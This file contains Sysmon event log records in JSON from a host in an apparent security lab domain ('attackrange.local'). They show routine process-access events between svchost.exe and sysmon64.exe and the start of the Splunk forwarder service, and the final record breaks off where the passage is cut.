{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.849\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.849","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.330\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nProcessId: 2792\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.330","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 2920\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: 